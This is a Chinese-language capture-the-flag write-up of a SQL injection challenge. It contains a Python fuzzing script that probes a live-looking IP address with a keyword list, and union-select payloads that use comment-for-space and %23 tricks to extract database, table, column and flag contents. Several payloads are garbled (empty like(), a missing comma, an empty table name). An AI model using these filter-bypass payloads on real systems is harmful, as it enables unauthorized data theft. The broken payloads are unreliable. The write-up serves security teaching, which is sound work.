1.打开环境,查看源代码。
发现变量wllm,传入1‘发现报错,是sql注入,进行fuzz测试
一个简单的python脚本
import requests
fuzz={'length ','+','handler','like','select','sleep','database','delete','having','or','as','-~','BENCHMARK','limit','left','select','insert'
,'sys.schema_auto_increment_columns','join','right','#','&','&&','\\','handler','---','--','--+','INFORMATION','--',';','!','%','+','xor','<>'
,'(','>','<',')','.','^','=','AND','BY','CAST','COLUMN','COUNT','CREATE','END','case',"'1'='1'",'when',"admin'",'length','+','REVERSE','ascii'
,'select','database','left','right','union','||','oorr','/','//','//*','*/*','/**/','anandd','GROUP','HAVING','IF','INTO','JOIN','LEAVE','LEFT'
,'LEVEL','sleep','LIKE','NAMES','NEXT','NULL','OF','ON','|','infromation_schema','user','OR','ORDER','ORD','SCHEMA','SELECT','SET','TABLE','THEN'
,'UPDATE','USER','USING','VALUE','VALUES','WHEN','WHERE','ADD','AND','prepare','set','update','delete','drop','inset','CAST','COLUMN','CONCAT'
,'GROUP_CONCAT','group_concat','CREATE','DATABASE','DATABASES','alter','DELETE','DROP','floor','rand()','information_schema.tables','TABLE_SCHEMA'
,'%df','concat_ws()','concat','LIMIT','ORD','ON'
,'extractvalue','order','CAST()','by','ORDER','OUTFILE','RENAME','REPLACE','SCHEMA','SELECT','SET','updatexml','SHOW','SQL','TABLE','THEN','TRUE','instr'
,'benchmark','format','bin','substring','ord','UPDATE','VALUES','VARCHAR','VERSION','WHEN','WHERE','/*','`',',','users','%0a','%0b','mid','for','BEFORE','REGEXP'
,'RLIKE','in','sys schemma','SEPARATOR','XOR','CURSOR','FLOOR','sys.schema_table_statistics_with_buffer','INFILE','count','%0c','from','%0d','%a0','=','@','else'}
for i in fuzz:
res = requests.get('http://1.14.71.254:28315/?wllm={}'.format(i))
if '请勿非法操作' in res.text:
print(i)
结果:
update
AND
DELETE
UPDATE
insert
updatexml
length
delete
right
extractvalue
REVERSE
sys schemma
+
=
--+
left
handler
substring
rand()
LEFT
anandd
OUTFILE
INTO
'1'='1'
发现=和空格都被过滤了
于是有payload:
-1'/**/order/**/by/**/4%23(爆字段,用%23代替#,/**/代替空格)
-1'/**/union/**/select/**/1,database(),3%23(爆库)
-1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables /**/where/**/table_schema/**/like()%23(爆表)
-1'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like()%23(爆列)
-1'/**/union/**/select/**/1,flag,3/**/from/**/''%23发现只能读取一部分flag
-1'/**/union/**/select/**/1,mid(group_concat(id,flag)20,40),3/**/from/**/''%23提取完整flag
知识点:
1.fuzz测试
2.sql注入
3.mid函数的使用